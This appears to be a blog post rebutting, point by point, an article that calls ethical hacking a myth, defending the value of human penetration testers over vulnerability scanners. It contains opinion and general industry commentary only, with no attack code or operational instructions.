— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this, standard you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”, your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by that way software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
—Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.